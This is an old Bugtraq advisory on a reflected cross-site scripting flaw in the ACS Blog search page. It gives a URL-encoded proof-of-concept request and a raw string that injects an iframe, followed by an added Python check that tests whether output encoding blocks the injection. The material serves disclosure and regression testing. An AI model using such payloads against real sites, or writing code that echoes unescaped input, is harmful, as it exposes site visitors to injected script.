List: bugtraq
Subject: XSS in ACS blog
From: farhad koosha <farhadkey () yahoo ! com>
Date: 2005-03-17 8:24:01
Message-ID: 20050317082401.8600.qmail () www ! securityfocus ! com
An XSS vulnerability exists in the ACS blog ( ASP WEBLOG SYSTEM ).
Vulnerable :
ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b
Code :
/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E
or go to /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>
Vendor URL : http://www.asppress.com
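
Added example, not part of the original post and not ACS Blog's code: a regression check that decodes the request above, reflects the search term into a results fragment with and without HTML encoding, and parses the output to see whether the submitted markup survives as live elements. The TEMPLATE markup and all function names are assumptions, since the advisory does not show where search.asp echoes the term.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Request exactly as posted in the advisory.
ADVISORY_REQUEST = ("/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22"
                    "http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E")

# Hypothetical results fragment (assumption): term echoed in an attribute and in text.
TEMPLATE = ('<form action="/search.asp"><input name="search" value="{term}"></form>'
            '<p>Results for: {term}</p>')

def search_term(request_uri):
    """Decode the 'search' query parameter as the web server would."""
    query = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    return query.get("search", [""])[0]

def render_unsafe(term):
    """Reflect the term verbatim, which is the behaviour the advisory reports."""
    return TEMPLATE.format(term=term)

def render_encoded(term):
    """HTML-encode before reflecting; classic ASP has Server.HTMLEncode for this."""
    return TEMPLATE.format(term=html.escape(term, quote=True))

class TagCollector(HTMLParser):
    """Records every element start tag found in the rendered markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def live_tags(markup):
    """Return the start tags a tolerant HTML parser sees in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def injected_tags(markup, expected=("form", "input", "p")):
    """Tags present in the output that the template itself never emits."""
    return [t for t in live_tags(markup) if t not in expected]

if __name__ == "__main__":
    for render in (render_unsafe, render_encoded):
        print(render.__name__, injected_tags(render(search_term(ADVISORY_REQUEST))))
```

A non-empty result from injected_tags means request data reached the page as markup, so the same check can be pointed at a saved response body after a fix is deployed.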